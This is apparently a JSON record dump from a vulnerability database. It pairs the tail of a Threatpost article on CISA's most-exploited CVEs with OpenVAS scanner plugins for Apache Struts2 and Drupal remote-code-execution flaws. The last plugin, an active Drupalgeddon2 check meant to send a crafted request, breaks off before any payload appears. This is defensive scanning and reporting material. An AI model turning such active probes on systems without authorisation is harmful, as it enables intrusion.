Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812584\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 10:53:12 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9.]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\") {\n fix = \"Upgrade to 8.5.1\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"Upgrade to 8.3.9\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"Upgrade to 8.4.6\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"Upgrade to 7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:06:51", "description": "Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1325-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891325", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891325\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1325-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u18\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-16T15:52:02", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-14T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310108438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:drupal:drupal\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108438\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-14 13:29:22 +0200 (Sat, 14 Apr 2018)\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\");\n script_mandatory_keys(\"drupal/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9, 8.4.6, 8.5.1,\n 7.58 or later. Please see the refereced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\ncheck = rand_str( length:16 );\n# nb: URL rewriting on/off\nurls = make_list( dir + \"/user/register\", dir + \"/?q=user/register\" );\n\nforeach url( urls ) {\n\n url = url + 